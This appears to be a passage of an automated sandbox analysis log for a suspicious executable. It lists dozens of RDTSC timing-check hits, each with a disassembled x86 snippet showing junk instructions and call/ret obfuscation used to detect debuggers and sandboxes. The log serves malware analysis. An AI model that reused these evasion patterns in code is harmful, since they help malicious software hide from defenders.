                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B58B6 second address: 10B5935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+12DC30E2h], edi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F87BC5165B8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov di, 7AF7h 0x0000003b mov eax, dword ptr [ebp+12DC0729h] 0x00000041 jmp 00007F87BC5165BBh 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebp 0x0000004b call 00007F87BC5165B8h 0x00000050 pop ebp 0x00000051 mov dword ptr [esp+04h], ebp 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc ebp 0x0000005e push ebp 0x0000005f ret 0x00000060 pop ebp 0x00000061 ret 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jl 00007F87BC5165BCh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B5935 second address: 10B5939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B47FD second address: 10B4803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B73EC second address: 10B746C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F87BD02CC94h 0x0000000f sub edi, dword ptr [ebp+12DC2007h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F87BD02CC88h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F87BD02CC88h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+12DC183Dh] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 ja 00007F87BD02CC97h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C0A11 second address: 10C0A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C0153 second address: 10C0162 instructions: 0x00000000 rdtsc 0x00000002 je 00007F87BD02CC86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C0162 second address: 10C016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C016A second address: 10C0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C0172 second address: 10C0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C05CF second address: 10C05D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C23D9 second address: 10C23EA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F87BC5165B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C23EA second address: 10C23F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C23F4 second address: 10C23F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C77B5 second address: 10C77B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C77B9 second address: 10C7814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 je 00007F87BC5165B6h 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 jmp 00007F87BC5165BFh 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e jnp 00007F87BC5165CCh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F87BC5165C0h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10C7814 second address: 10C7818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CB9C3 second address: 10CB9D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CB9D4 second address: 10CB9DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBCC7 second address: 10CBCCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBCCC second address: 10CBCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F87BD02CC86h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBCE3 second address: 10CBCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBCE7 second address: 10CBD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BD02CC86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F87BD02CC99h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBD0C second address: 10CBD16 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F87BC5165C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBD16 second address: 10CBD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBD1C second address: 10CBD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F87BC5165C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBD3A second address: 10CBD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CBEDB second address: 10CBEDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CC038 second address: 10CC03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CC03C second address: 10CC054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F87BC5165C2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CC359 second address: 10CC373 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F87BD02CC86h 0x00000008 jg 00007F87BD02CC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F87BD02CC8Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CC373 second address: 10CC3A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F87BC5165BEh 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007F87BC5165B6h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CC4EA second address: 10CC4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106263B second address: 106263F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CF46C second address: 10CF472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CF472 second address: 10CF496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F87BC5165C1h 0x0000000b jmp 00007F87BC5165BAh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CF496 second address: 10CF49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10CF49C second address: 10CF4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D510C second address: 10D5111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5111 second address: 10D5116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5116 second address: 10D511C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D53E6 second address: 10D5420 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F87BC5165BCh 0x0000000c js 00007F87BC5165B6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F87BC5165CBh 0x0000001b jmp 00007F87BC5165BAh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D56C1 second address: 10D572D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC99h 0x00000009 popad 0x0000000a jmp 00007F87BD02CC94h 0x0000000f jnp 00007F87BD02CC88h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push ecx 0x00000018 jmp 00007F87BD02CC91h 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jmp 00007F87BD02CC8Ah 0x00000027 pop edx 0x00000028 pushad 0x00000029 jmp 00007F87BD02CC8Dh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D572D second address: 10D5739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BC5165B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5739 second address: 10D573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D58C0 second address: 10D58D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5B8F second address: 10D5BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC95h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5BB0 second address: 10D5BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F87BC5165C0h 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f je 00007F87BC5165B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5D22 second address: 10D5D32 instructions: 0x00000000 rdtsc 0x00000002 je 00007F87BD02CC88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5ED8 second address: 10D5EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5EDE second address: 10D5EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D5EE2 second address: 10D5F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F87BC5165C2h 0x0000000c push esi 0x0000000d jmp 00007F87BC5165BEh 0x00000012 je 00007F87BC5165B6h 0x00000018 pop esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D607A second address: 10D607E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10D607E second address: 10D6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DACDB second address: 10DAD0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F87BD02CC98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F87BD02CC92h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAD0E second address: 10DAD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAD14 second address: 10DAD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F87BD02CC86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAD20 second address: 10DAD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F87BC5165BEh 0x0000000b jnl 00007F87BC5165B6h 0x00000011 jc 00007F87BC5165B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAE9D second address: 10DAEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007F87BD02CC86h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAEB0 second address: 10DAEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DB279 second address: 10DB298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F87BD02CC86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAA09 second address: 10DAA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAA0D second address: 10DAA15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DAA15 second address: 10DAA1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DFEE5 second address: 10DFEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DFEE9 second address: 10DFEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DFEED second address: 10DFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F87BD02CC88h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DFEFB second address: 10DFF18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10DFF18 second address: 10DFF47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BD02CC99h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1059E83 second address: 1059E9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F87BC5165C3h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E51B8 second address: 10E51C2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F87BD02CC86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4036 second address: 10E4042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F87BC5165B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4042 second address: 10E4047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4047 second address: 10E404E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A352C second address: 10A3553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3553 second address: 10A3575 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F87BC5165B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F87BC5165BAh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3575 second address: 10A3579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3579 second address: 10A357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A357F second address: 10A35E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F87BD02CC86h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F87BD02CC88h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 adc cl, 00000048h 0x0000002c call 00007F87BD02CC89h 0x00000031 pushad 0x00000032 jbe 00007F87BD02CC97h 0x00000038 jmp 00007F87BD02CC91h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F87BD02CC91h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A35E8 second address: 10A35EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3755 second address: 10A3763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3763 second address: 10A3768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A38A2 second address: 10A38BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A38BD second address: 10A38F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F87BC5165C6h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F87BC5165BAh 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A38F1 second address: 10A38F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
